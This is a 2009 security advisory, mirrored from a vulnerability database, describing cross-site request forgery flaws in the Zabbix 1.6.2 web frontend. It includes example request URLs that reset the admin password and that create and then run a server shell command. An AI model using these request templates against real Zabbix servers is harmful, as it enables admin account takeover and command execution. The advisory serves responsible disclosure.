Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:21553
HistoryApr 01, 2009 - 12:00 a.m.

Zabbix Multiple Frontend CSRF (Password reset & command execution)

2009-04-0100:00:00
vulners.com
36

nGenuity Information Services - Security Advisory

Advisory ID: NGENUITY-2009-006 - Zabbix Multiple Frontend CSRF
Application: Zabbix 1.6.2
Vendor: Zabbix
Vendor website: http://www.zabbix.com
Author: Adam Baldwin ([email protected])

I. BACKGROUND
"ZABBIX is an enterprise-class open source distributed monitoring solution." [1]

II. DETAILS
Multiple Cross-Site Request Forgery (CSRF) vulnerabilities exist that can allow for the
following
attack scenarios to be executed should an administrator with a valid session visit a malicious
page
or url.

 1. Reset admin password
 2. Execution of shell commands

 Reset Admin Password:
 Zabbix does not validate a users old password before the new password is set using a request
 similar to the below request. Some of the parameters are not required for the request to be
 valid.

 Example: http://example.com/zabbix/profile.php?autologout=900&change_password=Change%20password

&config=0&form=1&form_refresh=2&lang=en_gb&password1=aaaaaa&password2=aaaaaa&refresh=30
&save=Save&theme=default.css&url=&userid=1

 Execution of Shell Commands:
 A two staged approach is required to execute arbitrary shell commands. First the custom

command to
be executed has to be created and then that command has to be executed. Below is an example of
how
these requests could be executed.

 Example: Setting the command
 http://example.com/zabbix/scripts.php?action=1&access=2&command=touch%20/tmp/zabbix&form=1
 &form_refresh=1&form_refresh=1&groupid=0&name=Ping&save=Save&scriptid=1&usrgrpid=0

 Example: Executing the command
 http://example.com/zabbix/scripts_exec.php?execute=1&hostid=10017&scriptid=1

III. REFERENCES
[1] - http://www.zabbix.com

IV. VENDOR COMMUNICATION
3.22.2009 - Vulnerability Discovery
3.23.2009 - Vendor response. Fixed in 1.6.3 (unconfirmed)

Copyright (c) 2009 nGenuity Information Services, LLC
http://www.ngenuity.org/wordpress/2009/03/30/ngenuity-2009-006-zabbix-multiple-frontend-csrf/